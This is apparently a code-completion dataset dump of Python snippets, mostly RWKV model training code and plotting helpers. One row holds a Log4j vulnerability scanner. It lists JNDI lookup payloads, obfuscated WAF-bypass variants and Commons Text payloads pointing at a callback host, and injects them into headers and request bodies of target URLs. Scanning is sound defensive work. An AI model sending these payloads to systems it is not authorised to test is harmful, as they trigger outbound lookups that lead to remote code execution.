id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
6,108 | import os
import json
import random
import numpy as np
import torch
from torch.nn import functional as F
from torch.utils.data import Dataset
def set_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed) | null |
6,109 | from lib2to3.pgen2 import token
import os
import torch
import numpy as np
import shutil
import struct
from functools import lru_cache
from itertools import accumulate
The provided code snippet includes necessary dependencies for implementing the `print_rank_0` function. Write a Python function `def print_rank_0(*message)` to solve the following problem:
If distributed is initialized print only on rank 0.
Here is the function:
def print_rank_0(*message):
"""If distributed is initialized print only on rank 0."""
if torch.distributed.is_initialized():
if torch.distributed.get_rank() == 0:
print(*message, flush=True)
else:
print(*message, flush=True) | If distributed is initialized print only on rank 0. |
6,114 | import types
import copy
import torch
import math, os
from torch.nn import functional as F
import torch.nn as nn
if os.environ['RWKV_RUN_DEVICE'] == 'cuda':
T_MAX = 1024 # increase this if your ctx_len is long [NOTE: TAKES LOTS OF VRAM!]
# it's possible to go beyond CUDA limitations if you slice the ctx and pass the hidden state in each slice
from torch.utils.cpp_extension import load
wkv_cuda = load(name="wkv", sources=["cuda/wkv_op.cpp", "cuda/wkv_cuda.cu"],
verbose=True, extra_cuda_cflags=['-res-usage', '--maxrregcount 60', '--use_fast_math', '-O3', '-Xptxas -O3', f'-DTmax={T_MAX}'])
class WKV(torch.autograd.Function):
def forward(ctx, B, T, C, w, u, k, v):
def backward(ctx, gy):
def RUN_CUDA(B, T, C, w, u, k, v):
return WKV.apply(B, T, C, w.cuda(), u.cuda(), k.cuda(), v.cuda()) | null |
6,115 | import math, os
import numpy as np
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
from torch.utils.cpp_extension import load
class WKV(torch.autograd.Function):
def forward(ctx, B, T, C, w, u, k, v):
ctx.B = B
ctx.T = T
ctx.C = C
assert T <= T_MAX
assert B * C % min(C, 1024) == 0
if '32' in os.environ['RWKV_FLOAT_MODE']:
w = -torch.exp(w.contiguous())
u = u.contiguous()
k = k.contiguous()
v = v.contiguous()
else:
w = -torch.exp(w.float().contiguous())
u = u.float().contiguous()
k = k.float().contiguous()
v = v.float().contiguous()
ctx.save_for_backward(w, u, k, v)
y = torch.empty((B, T, C), device='cuda', memory_format=torch.contiguous_format)
wkv_cuda.forward(B, T, C, w, u, k, v, y)
if '32' in os.environ['RWKV_FLOAT_MODE']:
return y
elif os.environ['RWKV_FLOAT_MODE'] == 'fp16':
return y.half()
elif os.environ['RWKV_FLOAT_MODE'] == 'bf16':
return y.bfloat16()
def backward(ctx, gy):
B = ctx.B
T = ctx.T
C = ctx.C
assert T <= T_MAX
assert B * C % min(C, 1024) == 0
w, u, k, v = ctx.saved_tensors
gw = torch.zeros((B, C), device='cuda').contiguous()
gu = torch.zeros((B, C), device='cuda').contiguous()
gk = torch.zeros((B, T, C), device='cuda').contiguous()
gv = torch.zeros((B, T, C), device='cuda').contiguous()
if '32' in os.environ['RWKV_FLOAT_MODE']:
wkv_cuda.backward(B, T, C, w, u, k, v, gy.contiguous(), gw, gu, gk, gv)
else:
wkv_cuda.backward(B, T, C, w, u, k, v, gy.float().contiguous(), gw, gu, gk, gv)
gw = torch.sum(gw, dim=0)
gu = torch.sum(gu, dim=0)
if '32' in os.environ['RWKV_FLOAT_MODE']:
return (None, None, None, gw, gu, gk, gv)
elif os.environ['RWKV_FLOAT_MODE'] == 'fp16':
return (None, None, None, gw.half(), gu.half(), gk.half(), gv.half())
elif os.environ['RWKV_FLOAT_MODE'] == 'bf16':
return (None, None, None, gw.bfloat16(), gu.bfloat16(), gk.bfloat16(), gv.bfloat16())
def RUN_CUDA(B, T, C, w, u, k, v):
return WKV.apply(B, T, C, w.cuda(), u.cuda(), k.cuda(), v.cuda()) | null |
6,116 | import math, os
import numpy as np
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
print(f'\nRWKV_HEAD_QK_DIM {RWKV_HEAD_QK_DIM}\n')
from torch.utils.cpp_extension import load
def RWKV_Init(model, args): # fancy initialization of all lin & emb layer in the model
print("\n[--> first run, init model params (very slow for large models) <--]")
print("[so you shall only do it for 1 single GPU and save the checkpt and load it when using multiple GPU]\n")
for mm in model.modules():
if "RecursiveScriptModule" in str(type(mm)):
if mm.original_name not in ["Linear"]:
continue
ww = None
for name, param in mm.named_parameters():
if name == "weight":
ww = param
else:
m = mm
if not isinstance(m, (nn.Linear, nn.Embedding)):
continue
ww = m.weight
with torch.no_grad():
name = "[unknown weight]"
for name, parameter in model.named_parameters(): # find the name of the weight
if id(ww) == id(parameter):
break
shape = ww.shape
gain = 1.0
scale = 1.0 # extra scale for gain
if isinstance(m, nn.Embedding):
gain = math.sqrt(max(shape[0], shape[1]))
if shape[0] == args.vocab_size and shape[1] == args.n_embd: # token emb?
scale = 1e-4
else:
scale = 0
if isinstance(m, nn.Linear):
if shape[0] > shape[1]:
gain = math.sqrt(shape[0] / shape[1])
if shape[0] == args.vocab_size and shape[1] == args.n_embd: # final projection?
scale = 0.5
if hasattr(m, "scale_init"):
scale = m.scale_init
# print(f"{str(shape[0]).ljust(5)} {str(shape[1]).ljust(5)} {str(scale).ljust(4)} {name}")
gain *= scale
if scale == -999:
nn.init.eye_(ww)
elif gain == 0:
# zero init is great for some RWKV matrices
nn.init.zeros_(ww)
elif gain > 0:
nn.init.orthogonal_(ww, gain=gain)
else:
nn.init.normal_(ww, mean=0.0, std=-scale) | null |
6,117 | import random
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
def top_k_logits(logits, k):
v, ix = torch.topk(logits, k)
out = logits.clone()
out[out < v[:, [-1]]] = -float('Inf')
return out
def top_p_probs(probs, p):
out = probs.clone()
sorted_probs, sorted_indices = torch.sort(out, descending=True)
cumulative_probs = torch.cumsum(sorted_probs, dim=-1)
sorted_indices_to_remove = cumulative_probs > p
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
indices_to_remove = sorted_indices[sorted_indices_to_remove]
out[indices_to_remove] = 0
return out
def sample_logits(logits, pos, temperature=1.0, top_k=None, top_p=None, min_p_pow=None, min_p_ratio=None):
logits = logits[:, pos, :] / temperature
probs = F.softmax(logits, dim=-1)
if min_p_ratio is not None:
limit = torch.pow(torch.max(probs), min_p_pow) * min_p_ratio
logits[probs < limit] = -float('Inf')
if top_k is not None:
logits = top_k_logits(logits, top_k)
probs = F.softmax(logits, dim=-1)
if top_p is not None:
probs[0] = top_p_probs(probs[0], top_p)
ix = torch.multinomial(probs, num_samples=1)
return ix[0][0].cpu() | null |
6,118 | import random
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
def set_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed) | null |
6,119 | import math
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
def RWKV_Init(module, config): # fancy initialization of all lin & emb layer in the module
for m in module.modules():
if not isinstance(m, (nn.Linear, nn.Embedding)):
continue
with torch.no_grad():
name = '[unknown weight]'
for name, parameter in module.named_parameters(): # find the name of the weight
if id(m.weight) == id(parameter):
break
shape = m.weight.data.shape
gain = 1.0 # positive: gain for orthogonal, negative: std for normal
scale = 1.0 # extra scale for gain
if isinstance(m, nn.Linear):
if m.bias is not None:
m.bias.data.zero_()
if shape[0] > shape[1]:
gain = math.sqrt(shape[0] / shape[1])
if shape[0] == config.vocab_size and shape[1] == config.n_embd: # final projection?
scale = config.rwkv_emb_scale
if isinstance(m, nn.Embedding):
gain = math.sqrt(max(shape[0], shape[1]))
if shape[0] == config.vocab_size and shape[1] == config.n_embd: # token emb?
scale = config.rwkv_emb_scale
if hasattr(m, 'scale_init'):
scale = m.scale_init
print(str(shape[0]).ljust(5), str(shape[1]).ljust(5), f'{round(scale,2):g}'.ljust(4), name)
gain *= scale
if gain == 0:
nn.init.zeros_(m.weight) # zero init is great for some RWKV matrices
elif gain > 0:
nn.init.orthogonal_(m.weight, gain=gain)
else:
nn.init.normal_(m.weight, mean=0, std=-gain) | null |
6,120 | import math
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
def rotate_half(x):
x1, x2 = x[..., :x.shape[-1] // 2], x[..., x.shape[-1] // 2:]
return torch.cat((-x2, x1), -1)
def apply_rotary_pos_emb(q, k, cos, sin):
cos, sin = cos[...,:q.shape[-2],:], sin[...,:q.shape[-2],:]
return (q * cos) + (rotate_half(q) * sin), (k * cos) + (rotate_half(k) * sin) | null |
6,122 | import json, time, random, os
import numpy as np
import torch
from torch.nn import functional as F
def FermatPrimalityTest(number):
def MillerRabinPrimalityTest(number):
def MaybeIsPrime(number):
if FermatPrimalityTest(number) and MillerRabinPrimalityTest(number):
return True
else:
return False | null |
6,131 | import os, math, gc, importlib
import torch
import torch.nn as nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only
from pytorch_lightning.strategies import DeepSpeedStrategy
from torch.utils.cpp_extension import load
if 'x060' in os.environ["RWKV_MY_TESTING"]:
wkv6_cuda = load(name="wkv6", sources=["cuda/wkv6_op.cpp", f"cuda/wkv6_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}", f"-D_T_={int(os.environ['RWKV_CTXLEN'])}"])
class WKV_6(torch.autograd.Function):
def forward(ctx, B, T, C, H, r, k, v, w, u):
with torch.no_grad():
assert r.dtype == torch.bfloat16
assert k.dtype == torch.bfloat16
assert v.dtype == torch.bfloat16
assert w.dtype == torch.bfloat16
assert u.dtype == torch.bfloat16
assert HEAD_SIZE == C // H
ctx.B = B
ctx.T = T
ctx.C = C
ctx.H = H
assert r.is_contiguous()
assert k.is_contiguous()
assert v.is_contiguous()
assert w.is_contiguous()
assert u.is_contiguous()
ew = (-torch.exp(w.float())).contiguous()
ctx.save_for_backward(r, k, v, ew, u)
y = torch.empty((B, T, C), device=r.device, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
wkv6_cuda.forward(B, T, C, H, r, k, v, ew, u, y)
return y
def backward(ctx, gy):
with torch.no_grad():
assert gy.dtype == torch.bfloat16
B = ctx.B
T = ctx.T
C = ctx.C
H = ctx.H
assert gy.is_contiguous()
r, k, v, ew, u = ctx.saved_tensors
gr = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
gk = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
gv = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
gw = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
gu = torch.empty((B, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
wkv6_cuda.backward(B, T, C, H, r, k, v, ew, u, gy, gr, gk, gv, gw, gu)
gu = torch.sum(gu, 0).view(H, C//H)
return (None, None, None, None, gr, gk, gv, gw, gu)
else:
wkv5_cuda = load(name="wkv5", sources=["cuda/wkv5_op.cpp", f"cuda/wkv5_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}"])
def RUN_CUDA_RWKV6(B, T, C, H, r, k, v, w, u):
return WKV_6.apply(B, T, C, H, r, k, v, w, u) | null |
6,132 | import os, math, gc, importlib
import torch
import torch.nn as nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only
from pytorch_lightning.strategies import DeepSpeedStrategy
from torch.utils.cpp_extension import load
if 'x060' in os.environ["RWKV_MY_TESTING"]:
wkv6_cuda = load(name="wkv6", sources=["cuda/wkv6_op.cpp", f"cuda/wkv6_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}", f"-D_T_={int(os.environ['RWKV_CTXLEN'])}"])
else:
wkv5_cuda = load(name="wkv5", sources=["cuda/wkv5_op.cpp", f"cuda/wkv5_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}"])
class WKV_5(torch.autograd.Function):
def forward(ctx, B, T, C, H, r, k, v, w, u):
def backward(ctx, gy):
def RUN_CUDA_RWKV5(B, T, C, H, r, k, v, w, u):
return WKV_5.apply(B, T, C, H, r, k, v, w, u) | null |
6,133 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
def index_file_path(prefix_path):
return prefix_path + ".idx" | null |
6,134 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
def data_file_path(prefix_path):
return prefix_path + ".bin" | null |
6,135 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
tokenizer = TRIE_TOKENIZER("tokenizer/rwkv_vocab_v20230424.txt")
from src.binidx import MMapIndexedDataset
cnt = 0
print(f"### Convert {IN_FILE} to {OUT_NAME}.bin/idx...")
print(f"### Found {len(non_empty_lines)} non-empty lines in {IN_FILE}")
print("### Building binidx...")
builder = MMapIndexedDatasetBuilder(f"{OUT_NAME}.bin")
builder.finalize((f"{OUT_NAME}.idx"))
print("done")
print("### Verifying result...")
print(f"{'-'*80}\n### Final {OUT_NAME}.bin/idx has {data_size} tokens, {data_len} items. Dtype {data._index.dtype}")
def add_raw(raw):
global builder, cnt
out = tokenizer.encode(raw)
if tokenizer.decode(out) != raw:
print("ERROR" * 100)
exit(0)
out.append(0) # [0] = end_of_doc for rwkv tokenizer
builder.add_item(np.array(out, dtype=np.uint16))
builder.end_document()
if cnt % 500 == 0:
print(cnt, end=" ", flush=True)
cnt += 1 | null |
6,136 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
for i in range(N_EPOCH):
print(f"Shuffle: {i+1} out of {N_EPOCH}")
random.shuffle(non_empty_lines)
for entry in non_empty_lines:
file.write(entry + "\n")
def is_prime(n):
if n <= 1:
return False
if n <= 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
while i * i <= n:
if n % i == 0 or n % (i + 2) == 0:
return False
i += 6
return True | null |
6,140 | import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
timeout = 4
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}/",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}/{{random}}}",
"${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
"${j${k8s:k5:-ND}i:ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{callback_host}}/{{random}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}",
"${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}",
"${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{callback_host}}/{{random}}}"
]
cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
cve_2022_42889 = [
"${url:UTF-8::https://{{callback_host}}/}",
"${url:UTF-8::https://{{callback_host}}/{{random}}}",
"${url:UTF-8::http://{{callback_host}}/}",
"${url:UTF-8::http://{{callback_host}}/{{random}}}",
"${dns:address|{{callback_host}}}"
]
args = parser.parse_args()
proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
if args.custom_waf_bypass_payload:
waf_bypass_payloads.append(args.custom_waf_bypass_payload)
def get_fuzzing_headers(payload):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(args.headers_file, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
if args.exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
if "Referer" in fuzzing_headers:
fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
return fuzzing_headers
def get_fuzzing_post_data(payload):
fuzzing_post_data = {}
for i in post_data_parameters:
fuzzing_post_data.update({i: payload})
return fuzzing_post_data
def generate_waf_bypass_payloads(callback_host, random_string):
payloads = []
for i in waf_bypass_payloads:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45046_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45046:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2022_42889_payloads(callback_host, random_string):
payloads = []
for i in cve_2022_42889:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def parse_url(url):
"""
Parses the URL.
"""
# Url: https://example.com/login.jsp
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# FilePath: /login.jsp
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
return({"scheme": scheme,
"site": f"{scheme}://{urlparse.urlparse(url).netloc}",
"host": urlparse.urlparse(url).netloc.split(":")[0],
"file_path": file_path})
import requests
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]
if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads.extend(get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2022_42889:
cprint(f"[•] Scanning for CVE-2022-42889 (Apache Commons Text RCE)", "yellow")
payloads.extend(get_cve_2022_42889_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
if args.request_type.upper() == "POST" or args.run_all_tests:
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}") | null |
6,141 | import plotly.graph_objects as go
import numpy as np
from plotly.subplots import make_subplots
import streamlit as st
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,143 | import matplotlib.pyplot as plt
import numpy as np
plt.axis('equal')
plt.axis('square')
plt.axhline(y=0, color='k', linewidth = 0.25)
plt.axvline(x=0, color='k', linewidth = 0.25)
plt.xticks(np.arange(-5, 6))
plt.yticks(np.arange(-5, 6))
plt.xlabel('$x_1$')
plt.ylabel('$x_2$')
def plot_shape(X,copy = False):
if copy:
fill_color = np.array([255,236,255])/255
edge_color = np.array([255,0,0])/255
else:
fill_color = np.array([219,238,243])/255
edge_color = np.array([0,153,255])/255
plt.fill(X[:,0], X[:,1],
color = fill_color,
edgecolor = edge_color)
plt.plot(X[:,0], X[:,1],marker = 'x',
markeredgecolor = edge_color*0.5,
linestyle = 'None') | null |
6,144 | import matplotlib.pyplot as plt
import numpy as np
def plot_shape(X,copy = False):
if copy:
fill_color = np.array([255,236,255])/255
edge_color = np.array([255,0,0])/255
else:
fill_color = np.array([219,238,243])/255
edge_color = np.array([0,153,255])/255
plt.fill(X[:,0], X[:,1],
color = fill_color,
edgecolor = edge_color)
plt.plot(X[:,0], X[:,1],marker = 'x',
markeredgecolor = edge_color*0.5,
linestyle = 'None') | null |
6,145 | import streamlit as st
import plotly.graph_objects as go
import sympy
import numpy as np
from scipy.stats import multivariate_normal
rv = multivariate_normal([0, 0],
Sigma)
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,146 | import streamlit as st
import plotly.express as px
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.datasets import load_iris
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,147 | import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.datasets import load_iris
def heatmap(Matrices,Titles,Ranges,Equal_tags):
M1 = Matrices[0]
M2 = Matrices[1]
M3 = Matrices[2]
Title_1 = Titles[0]
Title_2 = Titles[1]
Title_3 = Titles[2]
fig, axs = plt.subplots(1, 5, figsize=(12, 3))
plt.sca(axs[0])
ax = sns.heatmap(M1,cmap='RdYlBu_r',
vmin = Ranges[0][0],
vmax = Ranges[0][1],
cbar=False,
xticklabels=False,
yticklabels=False)
if Equal_tags[0] == True:
ax.set_aspect("equal")
plt.title(Title_1)
plt.sca(axs[1])
plt.title('=')
plt.axis('off')
plt.sca(axs[2])
ax = sns.heatmap(M2,cmap='RdYlBu_r',
vmin = Ranges[1][0],
vmax = Ranges[1][1],
cbar=False,
xticklabels=False,
yticklabels=False)
if Equal_tags[1] == True:
ax.set_aspect("equal")
plt.title(Title_2)
plt.sca(axs[3])
plt.title('@')
plt.axis('off')
plt.sca(axs[4])
ax = sns.heatmap(M3,cmap='RdYlBu_r',
vmin = Ranges[2][0],
vmax = Ranges[2][1],
cbar=False,
xticklabels=False,
yticklabels=False)
if Equal_tags[2] == True:
ax.set_aspect("equal")
plt.title(Title_3)
def plot_four_figs(X,v_j,idx):
# Fig 1: X@v_j = z_j
z_j = X@v_j
Titles = ['$X$',
'$v_' + str(idx) + '$',
'$z_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([X,v_j,z_j],Titles,Ranges,Equal_tags)
# Fig 2: z@v_j.T = X_j
X_j = z_j@v_j.T
Titles = ['$z_' + str(idx) + '$',
'$v_' + str(idx) + '^T$',
'$X_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([z_j,v_j.T,X_j],Titles,Ranges,Equal_tags)
# Fig 3: T_j = v_j@v_j.T
T_j = v_j@v_j.T
Titles = ['$v_' + str(idx) + '$',
'$v_' + str(idx) + '^T$',
'$T_' + str(idx) + '$']
Ranges = [[-1,1],
[-1,1],
[-1,1]]
Equal_tags = [True,True,True]
heatmap([v_j,v_j.T,T_j],Titles,Ranges,Equal_tags)
# Fig 4: X@T_j = X_j
T_j = X@T_j
Titles = ['$X$',
'$T_' + str(idx) + '$',
'$X_' + str(idx) + '$']
Ranges = [[-2,11],
[-1,1],
[-2,11]]
Equal_tags = [False,True,False]
heatmap([X,T_j,X_j],Titles,Ranges,Equal_tags) | null |
6,149 | import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
def plot_heatmap(x,title):
fig, ax = plt.subplots()
ax = sns.heatmap(x,
cmap='RdYlBu_r',
cbar_kws={"orientation": "horizontal"}, vmin=-1, vmax=1)
ax.set_aspect("equal")
plt.title(title) | null |
6,150 | import streamlit as st
import numpy as np
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import plotly.express as px
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,151 | import numpy as np
import matplotlib.pyplot as plt
plt.ylabel('$x_2$')
plt.xlabel('$x_1$')
plt.axis('scaled')
plt.show()
def draw_vector(vector,RBG):
array = np.array([[0, 0, vector[0], vector[1]]])
X, Y, U, V = zip(*array)
plt.quiver(X, Y, U, V,angles='xy', scale_units='xy',scale=1,color = RBG) | null |
6,153 | import streamlit as st
import numpy as np
